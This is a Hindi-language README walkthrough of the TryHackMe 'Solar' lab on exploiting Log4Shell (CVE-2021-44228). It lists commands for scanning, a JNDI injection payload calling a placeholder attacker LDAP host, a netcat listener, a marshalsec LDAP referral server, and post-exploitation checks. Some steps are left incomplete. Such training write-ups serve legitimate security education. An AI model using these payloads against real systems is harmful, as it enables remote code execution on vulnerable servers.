
यह रिपॉजिटरी TryHackMe पर *Solar Exploiting Log4j रूम* का विस्तृत वॉकथ्रू प्रदान करती है, जो गंभीर Log4Shell भेद्यता (CVE-2021-44228) के शोषण पर केंद्रित है। यह प्रोजेक्ट दर्शाता है कि कैसे हमलावर Java अनुप्रयोगों में असुरक्षित लॉगिंग तंत्र का लाभ उठाकर रिमोट कोड निष्पादन प्राप्त कर सकते हैं।
प्लेटफ़ॉर्म: TryHackMe
कठिनाई: मध्यम
विषय: Log4Shell (Log4j भेद्यता)
Log4j भेद्यता (CVE-2021-44228) का शोषण करके रिमोट कोड निष्पादन प्राप्त करें और फ़्लैग कैप्चर करें।
nmap -sC -sV <TARGET_IP>
Log4j भेद्यता JNDI इंजेक्शन की अनुमति देती है:
${jndi:ldap://<ATTACKER_IP>:1389/a}
यदि इनपुट लॉग किया जाता है → भेद्यता मौजूद है।
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
LDAP सर्वर चलाएँ:
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
दुर्भावनापूर्ण Java क्लास बनाएँ (Exploit.class)
पेलोड को असुरक्षित फ़ील्ड में इंजेक्ट करें:
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 इस तरह के हेडर का उपयोग करें:
एक बार ट्रिगर होने पर:
जाँचें:
sudo -l
इनकी तलाश करें:
find / -name flag.txt 2>/dev/null
cat flag.txt